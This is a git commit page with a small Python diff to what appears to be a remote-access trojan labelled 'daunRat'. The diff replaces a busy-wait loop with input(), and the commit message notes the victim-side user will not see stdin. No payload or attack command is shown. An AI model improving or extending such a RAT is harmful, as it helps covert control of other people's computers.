replaced while True with input
user won't have access to stdin, so it's safe, but doesn't use so much CPU
This commit is contained in:
@@ -74,5 +74,4 @@ if __name__ == '__main__':
|
||||
print("daunRat by ANONYMUSSSS")
|
||||
receiver.connection.bind('pusher:connection_established', handle_connection_to_server)
|
||||
receiver.connect()
|
||||
while True:
|
||||
pass
|
||||
input()
|
||||
|
||||
Reference in New Issue
Block a user